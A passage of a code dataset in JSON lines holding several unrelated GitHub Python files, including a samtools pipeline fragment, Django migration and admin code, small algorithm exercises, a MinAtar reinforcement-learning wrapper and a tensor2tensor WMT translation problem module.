bam_path]\n\n # Python 3.4\n subprocess.call(cmd, stdout=self.al_out, stderr=self.al_err)\n\n bai_path = os.path.join(\n self.output_path, os.path.join(\"bam_sorted\", file_name + \".sort.bam.bai\"),\n )\n\n cmd = [\"samtools\", \"index\", bam_sorted_path, bai_path]\n\n # Python 3.4\n subprocess.call(cmd, stdout=self.al_out, stderr=self.al_err)\n\n cram_path = os.path.join(\n self.visualization_path, os.path.join(\"cram\", file_name + \".cram\")\n )\n cmd = [\n \"samtools\",\n \"view\",\n \"-T\",\n fasta_file_path,\n \"-C\",\n \"-o\",\n cram_path,\n bam_sorted_path,\n ]\n\n subprocess.call(cmd, stdout=self.al_out, stderr=self.al_err)\n\n cmd = [\"samtools\", \"index\", cram_path]\n\n subprocess.call(cmd, stdout=self.al_out, stderr=self.al_err)\n\n # dir_path = [\n # os.path.join(self.output_path, 'fastq'),\n # os.path.join(self.output_path, 'bam'),\n # os.path.join(self.output_path, 'sam'),\n # os.path.join(self.output_path, 'fasta_indexed')]\n # for cur_path in dir_path:\n # file_list = os.listdir(cur_path)\n # for fileName in file_list:\n # os.remove(cur_path + \"/\" + fileName)\n","repo_name":"FenyoLab/transposcope","sub_path":"transposcope/realigner.py","file_name":"realigner.py","file_ext":"py","file_size_in_byte":4222,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"5"} +{"seq_id":"11800251108","text":"import pandas as pd\nfrom datetime import datetime\n\ndef rank_targets(searches, search_urls, page, cached):\n '''\n Give the rankings of the searched websites and the rankings of specified targets\n\n Args:\n searches (list): list of searched items from scraping\n search_urls (list): list of corresponding urls\n page (list): list of page numbers\n cached (list): list of 1's and 0's identifying whether the link is cached\n\n Return:\n all_rankings (dataframe): ranking of each target in searched item in 'searches'\n\n '''\n\n # Rankings = index + 1 for all items\n all_rankings = list(range(1,len(searches)+1))\n\n # Clean '... 'from the dictionaries\n searches = [s.strip('... ') for s in searches]\n\n # Construct the dataframe from the results\n data_all = {'Name': searches,\n 'Rank': all_rankings,\n 'Page': page,\n 'URL': search_urls,\n 'Cached': cached\n }\n data_all['Date'] = datetime.now().now()\n\n df_all = pd.DataFrame.from_dict(data_all)\n\n return df_all\n","repo_name":"briantsai1317/web_scraping","sub_path":"rank_results.py","file_name":"rank_results.py","file_ext":"py","file_size_in_byte":1080,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"28911020910","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import migrations, models\nimport django.db.models.deletion\nfrom django.conf import settings\nimport taggit.managers\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('taggit', '0002_auto_20150616_2121'),\n migrations.swappable_dependency(settings.AUTH_USER_MODEL),\n ('main', '0011_v300_credential_domain_field'),\n ]\n\n operations = [\n migrations.CreateModel(\n name='Label',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('created', models.DateTimeField(default=None, editable=False)),\n ('modified', models.DateTimeField(default=None, editable=False)),\n ('description', models.TextField(default=b'', blank=True)),\n ('name', models.CharField(max_length=512)),\n ('created_by', models.ForeignKey(related_name=\"{u'class': 'label', u'app_label': 'main'}(class)s_created+\", on_delete=django.db.models.deletion.SET_NULL, default=None, editable=False, to=settings.AUTH_USER_MODEL, null=True)),\n ('modified_by', models.ForeignKey(related_name=\"{u'class': 'label', u'app_label': 'main'}(class)s_modified+\", on_delete=django.db.models.deletion.SET_NULL, default=None, editable=False, to=settings.AUTH_USER_MODEL, null=True)),\n ('organization', models.ForeignKey(related_name='labels', to='main.Organization', help_text='Organization this label belongs to.')),\n ('tags', taggit.managers.TaggableManager(to='taggit.Tag', through='taggit.TaggedItem', blank=True, help_text='A comma-separated list of tags.', verbose_name='Tags')),\n ],\n options={\n 'ordering': ('organization', 'name'),\n },\n ),\n migrations.AddField(\n model_name='activitystream',\n name='label',\n field=models.ManyToManyField(to='main.Label', blank=True),\n ),\n migrations.AddField(\n model_name='job',\n name='labels',\n field=models.ManyToManyField(related_name='job_labels', to='main.Label', blank=True),\n ),\n migrations.AddField(\n model_name='jobtemplate',\n name='labels',\n field=models.ManyToManyField(related_name='jobtemplate_labels', to='main.Label', blank=True),\n ),\n migrations.AlterUniqueTogether(\n name='label',\n unique_together=set([('name', 'organization')]),\n ),\n ]\n","repo_name":"wipro-sdx/Automation","sub_path":"venv/tower/lib/python2.7/site-packages/awx/main/migrations/0012_v300_create_labels.py","file_name":"0012_v300_create_labels.py","file_ext":"py","file_size_in_byte":2609,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"3713121099","text":"# 8방향 델타탐색\ndx = [0,0,1,-1,1,-1,-1,1]\ndy = [1,-1,0,0,1,-1,1,-1]\n\ndef BFS(x, y):\n visited = [[0] * M for _ in range(N)]\n queue = [(x, y)]\n visited[x][y] = 1\n num = 0\n while queue:\n sx, sy = queue.pop(0)\n for k in range(8):\n nx, ny = sx + dx[k], sy + dx[y]\n if 0 <= nx < N and 0 <= ny < M and visited[nx][ny]==0:\n queue.append((nx, ny))\n visited[nx][ny] = visited[sx][sy] + 1\n\n return visited\n\nN, M = map(int, (input().split()))\narr = [list(map(int, input().split())) for _ in range(N)]\n\n#상어가 있는 위치 저장\nshark = []\nfor i in range(N):\n for j in range(M):\n if arr[i][j] == 1:\n shark.append((i, j))\nprint(shark)\n\n# 튜플로 저장된 위치를 하나씩 가져와서 sx, sy에 할당\nfor sx, sy in shark:\n print(BFS(sx, sy))","repo_name":"SWan9710/baekjoon_problem","sub_path":"새 폴더/[BOJ]17086_아기상어2.py","file_name":"[BOJ]17086_아기상어2.py","file_ext":"py","file_size_in_byte":855,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"30386980961","text":"# -*- coding:utf-8 -*-\n\nimport zipfile\nimport os\nfrom pyhanlp.static import download, remove_file\n\nfrom pyhanlp import SafeJClass\nimport time\n\nNaiveBayesClassifier = SafeJClass('com.hankcs.hanlp.classification.classifiers.NaiveBayesClassifier')\nIOUtil = SafeJClass('com.hankcs.hanlp.corpus.io.IOUtil')\nFileset = SafeJClass('com.hankcs.hanlp.classification.corpus.FileDataSet')\n\n\ndef test_data_path():\n this_dir = os.getcwd()\n data_path = os.path.join(this_dir, 'data')\n if os.path.isdir(data_path):\n return data_path\n data_path = os.path.join(this_dir[:this_dir.find('pyhanlp')], 'pyhanlp', 'tests', 'data')\n if os.path.isdir(data_path):\n return data_path\n raise FileNotFoundError('找不到测试data目录,请在项目根目录下运行测试脚本')\n\n\ndef ensure_data(data_name, data_url):\n root_path = test_data_path()\n dest_path = os.path.join(root_path, data_name)\n if os.path.exists(dest_path):\n print(dest_path)\n return dest_path\n if data_url.endswith('.zip'):\n dest_path += '.zip'\n download(data_url, dest_path)\n if data_url.endswith('.zip'):\n with zipfile.ZipFile(dest_path, \"r\") as archive:\n archive.extractall(root_path)\n remove_file(dest_path)\n dest_path = dest_path[:-len('.zip')]\n return dest_path\n\n\ndef train_or_load_classifier():\n corpus_path = ensure_data('搜狗文本分类语料库迷你版',\n 'http://hanlp.linrunsoft.com/release/corpus/sogou-text-classification-corpus-mini.zip')\n model_path = corpus_path + '.ser'\n\n fileset = Fileset(corpus_path)\n if os.path.isfile(model_path):\n return NaiveBayesClassifier(IOUtil.readObjectFrom(model_path))\n classifier = NaiveBayesClassifier()\n classifier.train(fileset)\n model = classifier.getModel()\n IOUtil.saveObjectTo(model, model_path)\n\n\ndef predict(classifier, text):\n print(\"《%16s》\\t属于分类\\t【%s】\" % (text, classifier.classify(text)))\n\n\nif __name__ == '__main__':\n t1 = time.time()\n classifier = train_or_load_classifier()\n predict(classifier, \"C罗压梅西内马尔蝉联金球奖\")\n predict(classifier, \"英国造航母耗时8年仍未服役 被中国速度远远甩在身后\")\n predict(classifier, \"研究生考录模式亟待进一步专业化\")\n predict(classifier, \"如果真想用食物解压,建议可以食用燕麦\")\n predict(classifier, \"通用及其部分竞争对手目前正在考虑解决库存问题\")\n predict(classifier, \"英国简氏防务网站\")\n predict(classifier, \"一种风险或陷阱\")\n # predict(classifier, \"孔子是中国古代伟大的思想家、政治家、教育家,儒家学派创始人\")\n t2 = time.time()\n print(\"耗时:\", t2 - t1)\n","repo_name":"clnFind/NLPLearning","sub_path":"hanlp/hanlp_test1.py","file_name":"hanlp_test1.py","file_ext":"py","file_size_in_byte":2763,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"10653014440","text":"################################################################################\n\"\"\"\nDJ JOE Website Playlist File Generator\n--------------------------------------\n\n(c) 2021 - Stanley Solutions - Joe Stanley\n\nThis application serves an interface to allow the recording of Apple Music or\nSpotify playlists.\n\"\"\"\n################################################################################\n\nimport sys\nfrom pathlib import Path\n\nBASE = str(Path(__file__).parent.parent / \"app\")\n\nsys.path.insert(0, BASE)\n\n\nfrom spotify_client import SpotifyPlaylister\n\n\ndef test_client_doesnt_crash():\n \"\"\"Just make sure the Spotify Client doesn't die.\"\"\"\n playlister = SpotifyPlaylister(url=(\n \"https://open.spotify.com/playlist/3KHb0WRmzbp9WH7E2mXVmx?si=fa8f7abb94d74345\"\n ))\n print(playlister())\n\n\n# END\n","repo_name":"engineerjoe440/djjoeplaylister","sub_path":"test/test_spotify_client.py","file_name":"test_spotify_client.py","file_ext":"py","file_size_in_byte":808,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"5"} +{"seq_id":"13103765837","text":"# -*- coding: utf-8 -*-\n# author: itimor\n\nfrom django.contrib import admin\nfrom football.models import Duqiu\n\n@admin.register(Duqiu)\nclass DuqiuAdmin(admin.ModelAdmin):\n # 显示在管理页面的字段\n list_display = ('name', 'profit', 'win_item_company', 'win_item_cw_odds', 'win_percentage', 'draw_item_company', 'draw_item_cw_odds', 'draw_percentage', 'lose_item_company', 'lose_item_cw_odds', 'lose_percentage')\n # 定制过滤器\n list_filter = ('win_item_company','draw_item_company','lose_item_company')\n # 可查询字段\n search_fields = ('name',)\n # 可以修改内容的链接\n list_display_links = ['name']\n # 排序\n ordering = ('profit',)","repo_name":"itimor/treenew","sub_path":"football/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":684,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"1549968450","text":"\"\"\"\nCP1404/CP5632 Practical\nHex colour codes in a dictionary\nKeZhang\n\"\"\"\nNAME_TO_COLOUR_CODE = {\"absolute zero\": \"#0048ba\", \"acid green\": \"#b0bf1a\", \"aliceblue\": \"#f0f8ff\",\n \"alizarin crimson\": \"#e32636\",\n \"amaranth\": \"#e52b50\", \"amber\": \"#ffbf00\", \"amethyst\": \"#9966cc\", \"antiquewhite\": \"#faebd7\",\n \"apricot\": \"#fbceb1\", \"Aqua\": \"#00ffff\"}\n\n\ndef main():\n print_formatted_colour_codes(NAME_TO_COLOUR_CODE)\n colour_name = input(\"Enter colour name: \").lower()\n while colour_name != \"\":\n if colour_name in NAME_TO_COLOUR_CODE:\n print(colour_name, \"is\", NAME_TO_COLOUR_CODE[colour_name])\n else:\n print(\"Invalid colour name!\")\n print_formatted_colour_codes(NAME_TO_COLOUR_CODE)\n colour_name = input(\"Enter colour name: \").lower()\n\n\ndef print_formatted_colour_codes(code_to_name):\n \"\"\"Print name and code of colour in format.\"\"\"\n for name, code in code_to_name.items():\n print(f'{name} is {code}')\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"technical-zebra/CP1404_practicals","sub_path":"prac5_KeZhang/hex_colours.py","file_name":"hex_colours.py","file_ext":"py","file_size_in_byte":1070,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"11464348212","text":"import numpy as np\nfrom torch import nn\nimport torch.nn.functional as F\n\nimport gym\nfrom minatar import Environment\n\nfrom super_sac import nets\n\n\nclass MinAtarEnv(gym.Wrapper):\n def __init__(self, *args, **kwargs):\n self.env = Environment(*args, **kwargs)\n self.env.action_space = gym.spaces.Discrete(6)\n self.env.observation_space = None\n self.env.reward_range = None\n self.env.metadata = None\n super().__init__(self.env)\n\n def reset(self):\n self.env.reset()\n return self.env.state().astype(np.uint8).transpose(2, 0, 1)\n\n def step(self, act):\n reward, done = self.env.act(act)\n state = self.env.state().astype(np.uint8).transpose(2, 0, 1)\n return state, reward, done, {}\n\n @property\n def num_channels(self):\n return self.env.state_shape()[-1]\n\n def render(self, *args, **kwargs):\n self.env.display_state()\n\n\nclass MinAtarEncoder(nets.Encoder):\n def __init__(self, channels, emb_dim=50):\n super().__init__()\n self._dim = emb_dim\n self.conv1 = nn.Conv2d(channels, 16, kernel_size=3, stride=1)\n self.conv2 = nn.Conv2d(16, 16, kernel_size=2, stride=1)\n\n output_height, output_width = nets.cnns.compute_conv_output(\n (10, 10), kernel_size=(3, 3), stride=(1, 1)\n )\n output_height, output_width = nets.cnns.compute_conv_output(\n (output_height, output_width), kernel_size=(2, 2), stride=(1, 1)\n )\n self.fc = nn.Linear(output_height * output_width * 16, emb_dim)\n self.apply(nets.weight_init)\n\n @property\n def embedding_dim(self):\n return self._dim\n\n def forward(self, obs_dict):\n img = obs_dict[\"obs\"]\n x = F.relu(self.conv1(img))\n x = F.relu(self.conv2(x))\n x = x.view(x.size(0), -1)\n state = self.fc(x)\n return state\n","repo_name":"jakegrigsby/super_sac","sub_path":"experiments/minatar/minatar_utils.py","file_name":"minatar_utils.py","file_ext":"py","file_size_in_byte":1875,"program_lang":"python","lang":"en","doc_type":"code","stars":24,"dataset":"github-code","pt":"5"} +{"seq_id":"33884465156","text":"from __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nimport os\nimport tarfile\n\n# Dependency imports\n\nfrom tensor2tensor.data_generators import generator_utils\nfrom tensor2tensor.data_generators import problem\nfrom tensor2tensor.data_generators import text_encoder\nfrom tensor2tensor.data_generators import wsj_parsing\nfrom tensor2tensor.utils import registry\n\nimport tensorflow as tf\n\ntf.flags.DEFINE_string(\"ende_bpe_path\", \"\", \"Path to BPE files in tmp_dir.\"\n \"Download from https://drive.google.com/open?\"\n \"id=0B_bZck-ksdkpM25jRUN2X2UxMm8\")\n\nFLAGS = tf.flags.FLAGS\n\n\n# End-of-sentence marker.\nEOS = text_encoder.EOS_ID\n\n\ndef _default_token_feature_encoders(data_dir, target_vocab_size):\n vocab_filename = os.path.join(data_dir,\n \"vocab.endefr.%d\" % target_vocab_size)\n subtokenizer = text_encoder.SubwordTextEncoder(vocab_filename)\n return {\n \"inputs\": subtokenizer,\n \"targets\": subtokenizer,\n }\n\n\ndef _default_character_feature_encoders():\n return {\n \"inputs\": text_encoder.ByteTextEncoder(),\n \"targets\": text_encoder.ByteTextEncoder(),\n }\n\n\nclass WMTProblem(problem.Problem):\n \"\"\"Base class for WMT problems.\"\"\"\n\n @property\n def is_character_level(self):\n return False\n\n @property\n def targeted_vocab_size(self):\n raise NotImplementedError() # Not needed if self.is_character_level.\n\n @property\n def train_generator(self):\n \"\"\"Generator; takes data_dir, tmp_dir, is_training, targeted_vocab_size.\"\"\"\n raise NotImplementedError()\n\n @property\n def dev_generator(self):\n return self.train_generator\n\n @property\n def input_space_id(self):\n raise NotImplementedError()\n\n @property\n def target_space_id(self):\n raise NotImplementedError()\n\n @property\n def num_shards(self):\n return 100\n\n def generate_data(self, data_dir, tmp_dir, num_shards=None):\n if num_shards is None:\n num_shards = self.num_shards\n if self.is_character_level:\n generator_utils.generate_dataset_and_shuffle(\n self.train_generator(tmp_dir, True),\n self.training_filepaths(data_dir, num_shards, shuffled=False),\n self.dev_generator(tmp_dir, False),\n self.dev_filepaths(data_dir, 1, shuffled=False))\n else:\n generator_utils.generate_dataset_and_shuffle(\n self.train_generator(data_dir, tmp_dir, True,\n self.targeted_vocab_size),\n self.training_filepaths(data_dir, num_shards, shuffled=False),\n self.dev_generator(data_dir, tmp_dir, False,\n self.targeted_vocab_size),\n self.dev_filepaths(data_dir, 1, shuffled=False))\n\n def feature_encoders(self, data_dir):\n if self.is_character_level:\n return _default_character_feature_encoders()\n return _default_token_feature_encoders(data_dir, self.targeted_vocab_size)\n\n def hparams(self, defaults, unused_model_hparams):\n p = defaults\n if self.is_character_level:\n source_vocab_size = 256\n target_vocab_size = 256\n else:\n source_vocab_size = self._encoders[\"inputs\"].vocab_size\n target_vocab_size = self._encoders[\"targets\"].vocab_size\n p.input_modality = {\"inputs\": (registry.Modalities.SYMBOL,\n source_vocab_size)}\n p.target_modality = (registry.Modalities.SYMBOL, target_vocab_size)\n p.input_space_id = self.input_space_id\n p.target_space_id = self.target_space_id\n if self.is_character_level:\n p.loss_multiplier = 2.0\n\n\n# Generic generators used later for multiple problems.\n\n\ndef character_generator(source_path, target_path, character_vocab, eos=None):\n \"\"\"Generator for sequence-to-sequence tasks that just uses characters.\n\n This generator assumes the files at source_path and target_path have\n the same number of lines and yields dictionaries of \"inputs\" and \"targets\"\n where inputs are characters from the source lines converted to integers,\n and targets are characters from the target lines, also converted to integers.\n\n Args:\n source_path: path to the file with source sentences.\n target_path: path to the file with target sentences.\n character_vocab: a TextEncoder to encode the characters.\n eos: integer to append at the end of each sequence (default: None).\n\n Yields:\n A dictionary {\"inputs\": source-line, \"targets\": target-line} where\n the lines are integer lists converted from characters in the file lines.\n \"\"\"\n eos_list = [] if eos is None else [eos]\n with tf.gfile.GFile(source_path, mode=\"r\") as source_file:\n with tf.gfile.GFile(target_path, mode=\"r\") as target_file:\n source, target = source_file.readline(), target_file.readline()\n while source and target:\n source_ints = character_vocab.encode(source.strip()) + eos_list\n target_ints = character_vocab.encode(target.strip()) + eos_list\n yield {\"inputs\": source_ints, \"targets\": target_ints}\n source, target = source_file.readline(), target_file.readline()\n\n\ndef tabbed_generator(source_path, source_vocab, target_vocab, eos=None):\n \"\"\"Generator for sequence-to-sequence tasks using tabbed files.\n\n Tokens are derived from text files where each line contains both\n a source and a target string. The two strings are separated by a tab\n character ('\\t'). It yields dictionaries of \"inputs\" and \"targets\" where\n inputs are characters from the source lines converted to integers, and\n targets are characters from the target lines, also converted to integers.\n\n Args:\n source_path: path to the file with source and target sentences.\n source_vocab: a SunwordTextEncoder to encode the source string.\n target_vocab: a SunwordTextEncoder to encode the target string.\n eos: integer to append at the end of each sequence (default: None).\n\n Yields:\n A dictionary {\"inputs\": source-line, \"targets\": target-line} where\n the lines are integer lists converted from characters in the file lines.\n \"\"\"\n eos_list = [] if eos is None else [eos]\n with tf.gfile.GFile(source_path, mode=\"r\") as source_file:\n for line in source_file:\n if line and \"\\t\" in line:\n parts = line.split(\"\\t\", maxsplit=1)\n source, target = parts[0].strip(), parts[1].strip()\n source_ints = source_vocab.encode(source) + eos_list\n target_ints = target_vocab.encode(target) + eos_list\n yield {\"inputs\": source_ints, \"targets\": target_ints}\n\n\ndef token_generator(source_path, target_path, token_vocab, eos=None):\n \"\"\"Generator for sequence-to-sequence tasks that uses tokens.\n\n This generator assumes the files at source_path and target_path have\n the same number of lines and yields dictionaries of \"inputs\" and \"targets\"\n where inputs are token ids from the \" \"-split source (and target, resp.) lines\n converted to integers using the token_map.\n\n Args:\n source_path: path to the file with source sentences.\n target_path: path to the file with target sentences.\n token_vocab: text_encoder.TextEncoder object.\n eos: integer to append at the end of each sequence (default: None).\n\n Yields:\n A dictionary {\"inputs\": source-line, \"targets\": target-line} where\n the lines are integer lists converted from tokens in the file lines.\n \"\"\"\n eos_list = [] if eos is None else [eos]\n with tf.gfile.GFile(source_path, mode=\"r\") as source_file:\n with tf.gfile.GFile(target_path, mode=\"r\") as target_file:\n source, target = source_file.readline(), target_file.readline()\n while source and target:\n source_ints = token_vocab.encode(source.strip()) + eos_list\n target_ints = token_vocab.encode(target.strip()) + eos_list\n yield {\"inputs\": source_ints, \"targets\": target_ints}\n source, target = source_file.readline(), target_file.readline()\n\n\ndef bi_vocabs_token_generator(source_path,\n target_path,\n source_token_vocab,\n target_token_vocab,\n eos=None):\n \"\"\"Generator for sequence-to-sequence tasks that uses tokens.\n\n This generator assumes the files at source_path and target_path have\n the same number of lines and yields dictionaries of \"inputs\" and \"targets\"\n where inputs are token ids from the \" \"-split source (and target, resp.) lines\n converted to integers using the token_map.\n\n Args:\n source_path: path to the file with source sentences.\n target_path: path to the file with target sentences.\n source_token_vocab: text_encoder.TextEncoder object.\n target_token_vocab: text_encoder.TextEncoder object.\n eos: integer to append at the end of each sequence (default: None).\n\n Yields:\n A dictionary {\"inputs\": source-line, \"targets\": target-line} where\n the lines are integer lists converted from tokens in the file lines.\n \"\"\"\n eos_list = [] if eos is None else [eos]\n with tf.gfile.GFile(source_path, mode=\"r\") as source_file:\n with tf.gfile.GFile(target_path, mode=\"r\") as target_file:\n source, target = source_file.readline(), target_file.readline()\n while source and target:\n source_ints = source_token_vocab.encode(source.strip()) + eos_list\n target_ints = target_token_vocab.encode(target.strip()) + eos_list\n yield {\"inputs\": source_ints, \"targets\": target_ints}\n source, target = source_file.readline(), target_file.readline()\n\n\n# Data-set URLs.\n\n\n_ENDE_TRAIN_DATASETS = [\n [\n \"http://data.statmt.org/wmt16/translation-task/training-parallel-nc-v11.tgz\", # pylint: disable=line-too-long\n (\"training-parallel-nc-v11/news-commentary-v11.de-en.en\",\n \"training-parallel-nc-v11/news-commentary-v11.de-en.de\")\n ],\n [\n \"http://www.statmt.org/wmt13/training-parallel-commoncrawl.tgz\",\n (\"commoncrawl.de-en.en\", \"commoncrawl.de-en.de\")\n ],\n [\n \"http://www.statmt.org/wmt13/training-parallel-europarl-v7.tgz\",\n (\"training/europarl-v7.de-en.en\", \"training/europarl-v7.de-en.de\")\n ],\n]\n_ENDE_TEST_DATASETS = [\n [\n \"http://data.statmt.org/wmt16/translation-task/dev.tgz\",\n (\"dev/newstest2013.en\", \"dev/newstest2013.de\")\n ],\n]\n\n_ENFR_TRAIN_DATASETS = [\n [\n \"http://www.statmt.org/wmt13/training-parallel-commoncrawl.tgz\",\n (\"commoncrawl.fr-en.en\", \"commoncrawl.fr-en.fr\")\n ],\n [\n \"http://www.statmt.org/wmt13/training-parallel-europarl-v7.tgz\",\n (\"training/europarl-v7.fr-en.en\", \"training/europarl-v7.fr-en.fr\")\n ],\n [\n \"http://www.statmt.org/wmt14/training-parallel-nc-v9.tgz\",\n (\"training/news-commentary-v9.fr-en.en\",\n \"training/news-commentary-v9.fr-en.fr\")\n ],\n [\n \"http://www.statmt.org/wmt10/training-giga-fren.tar\",\n (\"giga-fren.release2.fixed.en.gz\", \"giga-fren.release2.fixed.fr.gz\")\n ],\n [\n \"http://www.statmt.org/wmt13/training-parallel-un.tgz\",\n (\"un/undoc.2000.fr-en.en\", \"un/undoc.2000.fr-en.fr\")\n ],\n]\n_ENFR_TEST_DATASETS = [\n [\n \"http://data.statmt.org/wmt16/translation-task/dev.tgz\",\n (\"dev/newstest2013.en\", \"dev/newstest2013.fr\")\n ],\n]\n\n_ZHEN_TRAIN_DATASETS = [[(\"http://data.statmt.org/wmt17/translation-task/\"\n \"training-parallel-nc-v12.tgz\"),\n (\"training/news-commentary-v12.zh-en.zh\",\n \"training/news-commentary-v12.zh-en.en\")]]\n\n_ZHEN_TEST_DATASETS = [[\n \"http://data.statmt.org/wmt17/translation-task/dev.tgz\",\n (\"dev/newsdev2017-zhen-src.zh\", \"dev/newsdev2017-zhen-ref.en\")\n]]\n\n# For Macedonian-English the SETimes corpus\n# from http://nlp.ffzg.hr/resources/corpora/setimes/ is used.\n# The original dataset has 207,777 parallel sentences.\n# For training the first 205,777 sentences are used.\n_MKEN_TRAIN_DATASETS = [[\n \"https://github.com/stefan-it/nmt-mk-en/raw/master/data/setimes.mk-en.train.tgz\", # pylint: disable=line-too-long\n (\"train.mk\", \"train.en\")\n]]\n\n# For development 1000 parallel sentences are used.\n_MKEN_TEST_DATASETS = [[\n \"https://github.com/stefan-it/nmt-mk-en/raw/master/data/setimes.mk-en.dev.tgz\", # pylint: disable=line-too-long\n (\"dev.mk\", \"dev.en\")\n]]\n\n\n# Generators.\n\n\ndef _get_wmt_ende_dataset(directory, filename):\n \"\"\"Extract the WMT en-de corpus `filename` to directory unless it's there.\"\"\"\n train_path = os.path.join(directory, filename)\n if not (tf.gfile.Exists(train_path + \".de\") and\n tf.gfile.Exists(train_path + \".en\")):\n # We expect that this file has been downloaded from:\n # https://drive.google.com/open?id=0B_bZck-ksdkpM25jRUN2X2UxMm8 and placed\n # in `directory`.\n corpus_file = os.path.join(directory, FLAGS.ende_bpe_path)\n with tarfile.open(corpus_file, \"r:gz\") as corpus_tar:\n corpus_tar.extractall(directory)\n return train_path\n\n\ndef ende_bpe_token_generator(data_dir, tmp_dir, train):\n \"\"\"Instance of token generator for the WMT en->de task, training set.\"\"\"\n dataset_path = (\"train.tok.clean.bpe.32000\"\n if train else \"newstest2013.tok.bpe.32000\")\n train_path = _get_wmt_ende_dataset(tmp_dir, dataset_path)\n token_tmp_path = os.path.join(tmp_dir, \"vocab.bpe.32000\")\n token_path = os.path.join(data_dir, \"vocab.bpe.32000\")\n tf.gfile.Copy(token_tmp_path, token_path, overwrite=True)\n token_vocab = text_encoder.TokenTextEncoder(vocab_filename=token_path)\n return token_generator(train_path + \".en\", train_path + \".de\", token_vocab,\n EOS)\n\n\ndef _compile_data(tmp_dir, datasets, filename):\n \"\"\"Concatenate all `datasets` and save to `filename`.\"\"\"\n filename = os.path.join(tmp_dir, filename)\n with tf.gfile.GFile(filename + \".lang1\", mode=\"w\") as lang1_resfile:\n with tf.gfile.GFile(filename + \".lang2\", mode=\"w\") as lang2_resfile:\n for dataset in datasets:\n url = dataset[0]\n compressed_filename = os.path.basename(url)\n compressed_filepath = os.path.join(tmp_dir, compressed_filename)\n\n lang1_filename, lang2_filename = dataset[1]\n lang1_filepath = os.path.join(tmp_dir, lang1_filename)\n lang2_filepath = os.path.join(tmp_dir, lang2_filename)\n\n if not os.path.exists(compressed_filepath):\n generator_utils.maybe_download(tmp_dir, compressed_filename, url)\n if not (os.path.exists(lang1_filepath) and\n os.path.exists(lang2_filepath)):\n mode = \"r:gz\" if \"gz\" in compressed_filepath else \"r\"\n with tarfile.open(compressed_filepath, mode) as corpus_tar:\n corpus_tar.extractall(tmp_dir)\n if \".gz\" in lang1_filepath:\n new_filepath = lang1_filepath.strip(\".gz\")\n generator_utils.gunzip_file(lang1_filepath, new_filepath)\n lang1_filepath = new_filepath\n if \".gz\" in lang2_filepath:\n new_filepath = lang2_filepath.strip(\".gz\")\n generator_utils.gunzip_file(lang2_filepath, new_filepath)\n lang2_filepath = new_filepath\n with tf.gfile.GFile(lang1_filepath, mode=\"r\") as lang1_file:\n with tf.gfile.GFile(lang2_filepath, mode=\"r\") as lang2_file:\n line1, line2 = lang1_file.readline(), lang2_file.readline()\n while line1 or line2:\n lang1_resfile.write(line1.strip() + \"\\n\")\n lang2_resfile.write(line2.strip() + \"\\n\")\n line1, line2 = lang1_file.readline(), lang2_file.readline()\n\n return filename\n\n\ndef ende_wordpiece_token_generator(data_dir, tmp_dir, train, vocab_size):\n symbolizer_vocab = generator_utils.get_or_generate_vocab(\n data_dir, tmp_dir, \"vocab.endefr.%d\" % vocab_size, vocab_size)\n datasets = _ENDE_TRAIN_DATASETS if train else _ENDE_TEST_DATASETS\n tag = \"train\" if train else \"dev\"\n data_path = _compile_data(tmp_dir, datasets, \"wmt_ende_tok_%s\" % tag)\n return token_generator(data_path + \".lang1\", data_path + \".lang2\",\n symbolizer_vocab, EOS)\n\ndef sequence_token_generator(data_dir, tmp_dir, train, vocab_size):\n symbolizer_vocab = generator_utils.seq_get_or_generate_vocab(\n data_dir, tmp_dir, \"vocab.endefr.%d\" % vocab_size, vocab_size)\n #datasets = _ENDE_TRAIN_DATASETS if train else _ENDE_TEST_DATASETS\n #tag = \"train\" if train else \"dev\"\n #data_path = _compile_data(tmp_dir, datasets, \"wmt_ende_tok_%s\" % tag)\n\n if train:\n return token_generator('t2t_split_data/input_train.txt', 't2t_split_data/target_train.txt',\n symbolizer_vocab, EOS)\n else:\n return token_generator('t2t_split_data/input_test.txt', 't2t_split_data/target_test.txt',\n symbolizer_vocab, EOS)\n\n\n@registry.register_problem(\"wmt_ende_tokens_8k\")\nclass WMTEnDeTokens8k(WMTProblem):\n \"\"\"Problem spec for WMT En-De translation.\"\"\"\n\n @property\n def targeted_vocab_size(self):\n return 2**13 # 8192\n\n @property\n def train_generator(self):\n return ende_wordpiece_token_generator\n\n @property\n def input_space_id(self):\n return problem.SpaceID.EN_TOK\n\n @property\n def target_space_id(self):\n return problem.SpaceID.DE_TOK\n###########\n@registry.register_problem(\"seq_tag_token_8k\")\nclass SeqTagToken8k(WMTProblem):\n\n @property\n def targeted_vocab_size(self):\n return 2**13 # 8192\n\n @property\n def train_generator(self):\n return sequence_token_generator\n\n @property\n def input_space_id(self):\n return problem.SpaceID.EN_TOK\n\n @property\n def target_space_id(self):\n return problem.SpaceID.GENERIC\n\n@registry.register_problem(\"seq_tag_token_32k\")\nclass SeqTagToken8k(WMTProblem):\n\n @property\n def targeted_vocab_size(self):\n return 2**15 # 32768\n\n @property\n def train_generator(self):\n return sequence_token_generator\n\n @property\n def input_space_id(self):\n return problem.SpaceID.EN_TOK\n\n @property\n def target_space_id(self):\n return problem.SpaceID.GENERIC\n\n@registry.register_problem(\"seq_tag_token_128k\")\nclass SeqTagToken8k(WMTProblem):\n\n @property\n def targeted_vocab_size(self):\n return 2**17 # 128\n\n @property\n def train_generator(self):\n return sequence_token_generator\n\n @property\n def input_space_id(self):\n return 